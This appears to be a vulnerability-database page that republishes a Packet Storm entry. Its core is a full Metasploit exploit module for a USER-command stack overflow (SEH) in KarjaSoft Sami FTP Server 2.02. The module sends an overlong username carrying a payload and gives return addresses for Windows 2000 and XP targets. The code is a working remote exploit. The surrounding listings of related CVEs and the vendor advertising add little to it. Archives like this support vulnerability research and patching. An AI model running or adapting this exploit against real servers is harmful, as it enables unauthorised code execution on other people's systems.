Lucene search
K

KarjaSoft Sami FTP Server v2.02 USER Overflow

🗓️ 26 Nov 2009 00:00:00Reported by patrickType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 28 Views

KarjaSoft Sami FTP Server v2.02 USER Overflow exploi

Related
Code
ReporterTitlePublishedViews
Family
0day.today
KarjaSoft Sami FTP Server 2.0.2 - USER/PASS Remote Buffer Overflow (SEH) Exploit
1 Nov 201600:00
zdt
Tenable Nessus
SAMI FTP Server <= 2.0.2 Authentication Credentials Remote Overflow
18 Aug 200400:00
nessus
Circl
CVE-2006-0441
30 Apr 201000:00
circl
Circl
CVE-2006-2212
30 Apr 201000:00
circl
CVE
CVE-2006-0441
26 Jan 200622:00
cve
CVE
CVE-2006-2212
5 May 200610:00
cve
Cvelist
CVE-2006-0441
26 Jan 200622:00
cvelist
Cvelist
CVE-2006-2212
5 May 200610:00
cvelist
Metasploit
KarjaSoft Sami FTP Server v2.0.2 USER Overflow
17 Mar 200814:23
metasploit
NVD
CVE-2006-0441
26 Jan 200622:03
nvd
Rows per page
`##  
# $Id$  
##  
  
##  
# This file is part of the Metasploit Framework and may be subject to   
# redistribution and commercial restrictions. Please see the Metasploit  
# Framework web site for more information on licensing and terms of use.  
# http://metasploit.com/framework/   
##  
  
require 'msf/core'  
  
  
class Metasploit3 < Msf::Exploit::Remote  
  
include Msf::Exploit::Remote::Tcp  
include Msf::Exploit::Remote::Seh  
  
def initialize(info = {})  
super(update_info(info,   
'Name' => 'KarjaSoft Sami FTP Server v2.02 USER Overflow',  
'Description' => %q{  
This module exploits the KarjaSoft Sami FTP Server version 2.02  
by sending an excessively long USER string. The stack is overwritten  
when the administrator attempts to view the FTP logs. Therefore, this exploit  
is passive and requires end-user interaction. Keep this in mind when selecting  
payloads. When the server is restarted, it will re-execute the exploit until  
the logfile is manually deleted via the file system.  
},  
'Author' => [ 'patrick' ],  
'Arch' => [ ARCH_X86 ],  
'License' => MSF_LICENSE,  
'Version' => '$Revision$',  
'Stance' => Msf::Exploit::Stance::Passive,  
'References' =>  
[  
# This exploit appears to have been reported multiple times.  
[ 'CVE', '2006-0441'],  
[ 'CVE', '2006-2212'],  
[ 'OSVDB', '25670'],  
[ 'BID', '16370'],  
[ 'BID', '22045'],  
[ 'BID', '17835'],  
[ 'URL', 'http://www.milw0rm.com/exploits/1448'],  
[ 'URL', 'http://www.milw0rm.com/exploits/1452'],  
[ 'URL', 'http://www.milw0rm.com/exploits/1462'],  
[ 'URL', 'http://www.milw0rm.com/exploits/3127'],  
[ 'URL', 'http://www.milw0rm.com/exploits/3140'],  
],  
'DefaultOptions' =>  
{  
'EXITFUNC' => 'seh',  
},   
'Platform' => ['win'],  
'Privileged' => false,  
'Payload' =>  
{  
'Space' => 300,  
'BadChars' => "\x00\x0a\x0d\x20\xff",  
'StackAdjustment' => -3500,  
},  
'Targets' =>  
[  
[ 'Windows 2000 Pro All - English', { 'Ret' => 0x75022ac4 } ], # p/p/r ws2help.dll  
[ 'Windows 2000 Pro All - Italian', { 'Ret' => 0x74fd11a9 } ], # p/p/r ws2help.dll  
[ 'Windows 2000 Pro All - French', { 'Ret' => 0x74fa12bc } ], # p/p/r ws2help.dll  
[ 'Windows XP SP0/1 - English', { 'Ret' => 0x71aa32ad } ], # p/p/r ws2help.dll   
],  
'DisclosureDate' => 'Jan 24 2006'))  
  
register_options(  
[  
Opt::RPORT(21),  
], self.class)  
end  
  
def check  
connect  
banner = sock.get(-1,3)  
disconnect  
  
if (banner =~ /Sami FTP Server 2.0.2/)  
return Exploit::CheckCode::Vulnerable  
end  
return Exploit::CheckCode::Safe  
end  
  
def exploit  
connect  
  
sploit = Rex::Text.rand_text_alphanumeric(596) + generate_seh_payload(target.ret)  
  
login = "USER #{sploit}\r\n"  
login << "PASS " + Rex::Text.rand_char(payload_badchars)  
  
sock.put(login + "\r\n")  
  
handler  
disconnect  
end  
  
end  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

26 Nov 2009 00:00Current
0.3Low risk
Vulners AI Score0.3
EPSS0.78031
28